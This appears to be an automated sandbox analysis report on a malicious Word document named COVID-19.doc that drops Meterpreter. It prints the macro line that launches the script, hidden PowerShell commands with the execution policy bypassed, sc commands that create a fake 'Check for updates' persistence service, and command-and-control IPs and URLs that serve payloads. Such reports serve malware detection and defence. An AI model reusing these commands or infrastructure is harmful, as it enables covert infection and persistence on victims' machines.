Loading ...

Play interactive tourEdit tour

Analysis Report COVID-19.doc

Overview

General Information

Sample Name:COVID-19.doc
Analysis ID:341993
MD5:9f9f50f3c32ee660a8bbe6616dda8b34
SHA1:6c338a10e894bcad8c67e5da332a6cd7f75f35e0
SHA256:9d063fd60d7d0fb2d4d92f0f348bb2397cf80dd8a4fec5680647469b570f2afe

Most interesting Screenshot:

Detection

Meterpreter
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected Meterpreter
Bypasses PowerShell execution policy
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Document contains an embedded VBA macro which might access itself as a file (possible anti-VM)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Found evasive API chain (may stop execution after checking mutex)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
May check the online IP address of the machine
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Suspicious javascript / visual basic script found (invalid extension)
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Document contains embedded VBA macros
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6040 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • wscript.exe (PID: 4248 cmdline: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 2804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5108 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5388 cmdline: 'C:\Windows\system32\cmd.exe' /C sc delete checkupdate MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 2912 cmdline: sc delete checkupdate MD5: 24A3E2603E63BCB9695A2935D3B24695)
          • cmd.exe (PID: 1476 cmdline: 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 3064 cmdline: sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates' MD5: 24A3E2603E63BCB9695A2935D3B24695)
          • cmd.exe (PID: 4812 cmdline: 'C:\Windows\system32\cmd.exe' /C sc start checkupdate MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 3544 cmdline: sc start checkupdate MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • svchost.exe (PID: 2864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cmd.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5112 cmdline: C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5656 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • svchost.exe (PID: 2460 cmdline: C:\Windows\system32\svchost.exe -k netsvcs MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\d569872345345[1].txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x7e:$sb3: -WindowStyle Hidden
  • 0x145:$sb3: -WindowStyle Hidden
  • 0x73:$sc2: -NoProfile
  • 0x63:$sd2: -NonInteractive
  • 0x445:$se3: -ExecutionPolicy Bypass
C:\Users\user\Documents\20210120\PowerShell_transcript.648351.BCz0DRM3.20210120103110.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x171:$sb3: -WindowStyle Hidden
  • 0x166:$sc2: -NoProfile
  • 0x156:$sd2: -NonInteractive
  • 0x136:$se3: -ExecutionPolicy Bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.793327668.000000000469F000.00000004.00000001.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0xea806:$sb3: -WindowStyle Hidden
  • 0xea7fb:$sc2: -NoProfile
  • 0xea7eb:$sd2: -NonInteractive
  • 0xea7cb:$se3: -ExecutionPolicy Bypass
00000004.00000002.789971993.0000000000B70000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x391e:$sb3: -WindowStyle Hidden
  • 0x3913:$sc2: -NoProfile
  • 0x3903:$sd2: -NonInteractive
  • 0x38e3:$se3: -ExecutionPolicy Bypass
00000001.00000003.656718758.0000000005DD3000.00000004.00000040.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0xdc2:$sb3: -WindowStyle Hidden
  • 0xe89:$sb3: -WindowStyle Hidden
  • 0x41de:$sb3: -WindowStyle Hidden
  • 0x42a5:$sb3: -WindowStyle Hidden
  • 0xdb7:$sc2: -NoProfile
  • 0x41d3:$sc2: -NoProfile
  • 0xda7:$sd2: -NonInteractive
  • 0x41c3:$sd2: -NonInteractive
  • 0x1189:$se3: -ExecutionPolicy Bypass
  • 0x45a5:$se3: -ExecutionPolicy Bypass
00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmpHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x4a24:$s1: WS2_32.dll
  • 0x4b50:$s2: ReflectiveLoader
00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmpReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedunknown
  • 0x4b50:$s1: ReflectiveLoader
  • 0x4b4f:$s3: ?ReflectiveLoader@@
Click to see the 8 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
17.2.svchost.exe.4c0000.0.raw.unpackHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x4a24:$s1: WS2_32.dll
  • 0x4b50:$s2: ReflectiveLoader
17.2.svchost.exe.4c0000.0.raw.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedunknown
  • 0x4b50:$s1: ReflectiveLoader
  • 0x4b4f:$s3: ?ReflectiveLoader@@
17.2.svchost.exe.4c0000.0.raw.unpackPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x42b4:$sb3: -WindowStyle Hidden
  • 0x42a9:$sc2: -NoProfile
  • 0x4299:$sd2: -NonInteractive
  • 0x4279:$se3: -ExecutionPolicy Bypass
17.2.svchost.exe.4c0000.0.unpackHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x3824:$s1: WS2_32.dll
  • 0x3950:$s2: ReflectiveLoader
17.2.svchost.exe.4c0000.0.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedunknown
  • 0x3950:$s1: ReflectiveLoader
  • 0x394f:$s3: ?ReflectiveLoader@@
Click to see the 2 entries

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, CommandLine: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6040, ProcessCommandLine: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, ProcessId: 4248
Sigma detected: Suspicious Svchost ProcessShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\system32\svchost.exe -k netsvcs, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5656, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs, ProcessId: 2460

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Machine Learning detection for sampleShow sources
Source: COVID-19.docJoe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
Source: global trafficDNS query: name: ifconfig.me
Source: global trafficTCP traffic: 192.168.2.4:49715 -> 78.141.194.181:80
Source: global trafficTCP traffic: 192.168.2.4:49715 -> 78.141.194.181:80

Networking:

barindex
Yara detected MeterpreterShow sources
Source: Yara matchFile source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: ifconfig.me
Source: Joe Sandbox ViewIP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox ViewIP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox ViewASN Name: ALEXHOSTMD ALEXHOSTMD
Source: global trafficHTTP traffic detected: GET /d569872345345.txt HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.141.194.181Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /c7mnnlrmfut6g1erfewlxlxniyo.php HTTP/1.1Host: 45.67.229.125User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Accept: */*
Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: ifconfig.meUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: */*Connection: close
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C300C recv,
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 09:30:47 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Fri, 25 Dec 2020 16:29:47 GMTETag: "5a7-5b74c6eccbba7-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 772Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/plainData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 54 6d 6f d3 30 10 fe dc fc 8a 53 55 94 56 c8 d9 ba 96 31 8a f6 61 94 01 95 d8 5a 2d 88 7d 60 08 79 ce b5 31 24 76 b0 9d 6e 15 f4 bf 73 76 32 68 11 2f 91 92 d8 be b7 e7 9e bb 73 c5 0d 2f fb 1f 66 ca 8d 8e 3e f6 78 56 4a 75 25 57 b9 b3 70 0a 87 83 48 2e fb b0 77 ca f0 2b 1c c2 20 fa 16 75 7a dc ac bc 5a cc ce ef 51 d4 4e 6a b5 d0 85 14 1b 78 b1 a9 b8 25 dd 4b fd 56 af b4 ff 2b 0a 80 86 0b 27 d7 e8 f7 0b a3 97 b2 a0 e5 b5 54 99 be 4b dd 86 36 6f 64 96 a1 02 f6 ca 4b ba 31 3c 86 de c5 66 a6 d6 5a 70 ef 3c f9 b5 bc e4 25 92 38 ee 02 db 05 37 8c 09 95 a9 95 c2 8c 70 f5 96 bc b0 18 75 ee 72 f2 d7 07 a6 b4 83 07 e9 20 ea 50 06 9d 77 66 43 5f bf ea a4 8e 1b c7 08 97 40 0f dd 63 58 70 97 43 b7 d2 77 68 6c 8e 45 91 e0 3d 52 c4 33 b3 aa 4b 54 ee ad b4 e4 30 90 f0 c7 34 de a3 b9 85 ab 5a 9d 59 ef 7f 07 97 33 35 c1 ea 6c e9 9d 72 27 f2 16 02 ed b7 d1 16 22 24 d4 f0 2d 02 7a 7a f3 f4 cc 88 5c 3a 14 ae 36 48 c6 fd d7 e8 d8 75 29 e7 b7 9f e9 0c d8 b4 f0 4c 53 f8 d1 d1 a7 79 45 14 3b a9 56 e9 c6 3a 2c e1 3b a4 58 90 16 6b 95 e9 f9 cd 1f 3b 37 46 9b 33 e1 39 85 d4 e9 6a 90 ec 6b 04 14 72 09 fd df 91 b0 f3 af 10 1f 8f d9 ad 74 f1 a0 45 fb f0 f4 aa ca e6 ba f4 70 e3 e9 e4 a6 e1 c6 de 10 aa eb f9 f5 f1 f8 e1 60 e1 89 4d 3d b1 37 eb 61 72 18 07 1f 5b d8 49 ff ff 0e 29 cd d1 d1 bf 1d 46 0d 93 b5 29 c8 bc 9b 3b 57 4d 0e 0e 9e 9e 24 c3 f1 30 19 3e 1b 27 c3 93 e1 81 1d 8d 9f 9d 3c 1d 8f 9e d0 37 71 f7 ae db 1a 65 d6 85 66 3c 85 0f 4d b0 64 36 4f 7c 5b 7c 9c 4c a8 10 57 9c e2 96 5e c3 37 64 7f e0 5b 32 a9 ec b0 89 dc 5b 36 a6 3f d1 93 f4 26 74 75 eb b6 09 32 2b 2b 4d 9d 77 a1 b3 9a d4 5f 48 67 df 19 ae ec 12 4d 10 37 7d b9 7b 0c 2c d5 b5 11 d8 e4 c4 5e a2 a5 9a 87 b1 68 42 b6 d8 2d 9a b5 14 1e 00 c4 56 80 30 c8 1d 82 c8 51 7c a9 ab cc af 6f a5 aa 28 17 62 e5 d1 74 7e 91 2e ce a7 8f e0 60 0a d6 47 84 bd a3 80 7a 37 8d fd a1 80 bf de 00 81 bd 60 1d c8 08 23 1b fc 9f 42 86 05 df 60 c6 78 ed 34 bc 94 b6 a2 ad a7 91 e0 4c 3d 48 58 6a 03 0d 52 db 6d 19 15 a5 1f a0 2e fd 42 58 0f 56 78 47 b8 9f d9 f3 1d 85 07 1e 9e ef 1b 35 49 ee da b4 35 f7 97 cc 17 a4 84 2a 43 17 81 27 95 4d 75 59 52 a5 43 f8 06 47 65 f4 aa 6d 8c 9e 15 46 56 6e 52 ee de 54 17 9b d6 26 34 4b b0 b9 c2 52 af 91 cd fc 60 fe b2 67 af b4 af e4 fe 1c 92 40 b9 82 5c 28 2a 2c 5d 15 d1 36 fa 01 72 ee da 87 a7 05 00 00 Data Ascii: Tmo0SUV1aZ-}`y1$vnsv2h/s/f>xVJu%WpH.w+ uzZQNjx%KV+'TK6odK1<fZp<%87pur PwfC_@cXpCwhlE=R3KT04ZY35lr'"$-zz\:6Hu)
Source: global trafficHTTP traffic detected: GET /d569872345345.txt HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.141.194.181Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /s34987435987.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 23 Dec 2020 13:46:16 GMTUser-Agent: Microsoft BITS/7.8Host: 78.141.194.181
Source: global trafficHTTP traffic detected: GET /c7mnnlrmfut6g1erfewlxlxniyo.php HTTP/1.1Host: 45.67.229.125User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Accept: */*
Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: ifconfig.meUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: */*Connection: close
Source: unknownDNS traffic detected: queries for: ifconfig.me
Source: svchost.exe, 00000006.00000002.929375850.000001832207E000.00000004.00000001.sdmpString found in binary or memory: http://78.141.194.181/
Source: COVID-19.docString found in binary or memory: http://78.141.194.181/d5698723
Source: wscript.exe, 00000001.00000002.657537766.0000000003936000.00000004.00000040.sdmp, COVID-19.doc, COVID-19.tmp.0.drString found in binary or memory: http://78.141.194.181/d569872345345.txt
Source: COVID-19.docString found in binary or memory: http://78.141.194.181/d569872345345.txt$$
Source: svchost.exe, 00000006.00000002.927329386.000001831D313000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.926379288.000001831CA3D000.00000004.00000001.sdmp, d569872345345[1].txt.1.drString found in binary or memory: http://78.141.194.181/s34987435987.txt
Source: svchost.exe, 00000006.00000002.926379288.000001831CA3D000.00000004.00000001.sdmpString found in binary or memory: http://78.141.194.181/s34987435987.txt757AE1B
Source: edb.log.6.drString found in binary or memory: http://78.141.194.181/s34987435987.txt7C:
Source: powershell.exe, 00000004.00000002.794647491.0000000004979000.00000004.00000001.sdmpString found in binary or memory: http://78.141.194.181/s34987435987.txtx
Source: svchost.exe, 00000006.00000002.929327170.0000018322066000.00000004.00000001.sdmpString found in binary or memory: http://78.141.194.181:80/s34987435987.txt
Source: powershell.exe, 00000002.00000002.702993895.0000000000FB8000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.790102113.0000000000BA6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000006.00000002.929781703.0000018322330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000002.00000002.705342342.0000000004ED1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793030596.0000000004651000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C2BAB OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,

System Summary:

barindex
Document contains an embedded VBA macro which might access itself as a file (possible anti-VM)Show sources
Source: COVID-19.docOLE, VBA macro line: f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
Source: COVID-19.docOLE, VBA macro line: f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: COVID-19.docOLE, VBA macro line: c = "wscript /e:jscript " + f
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: c = "wscript /e:jscript " + f
Document contains an embedded macro with GUI obfuscationShow sources
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string wscript.shell in non macro stream
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string activexobject in non macro stream
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string scripting.filesystemobject in non macro stream
Suspicious javascript / visual basic script found (invalid extension)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C1849 GetSystemDirectoryA,PathAppendA,CreateProcessA,ZwAllocateVirtualMemory,ZwWriteVirtualMemory,ZwSetContextThread,ZwResumeThread,
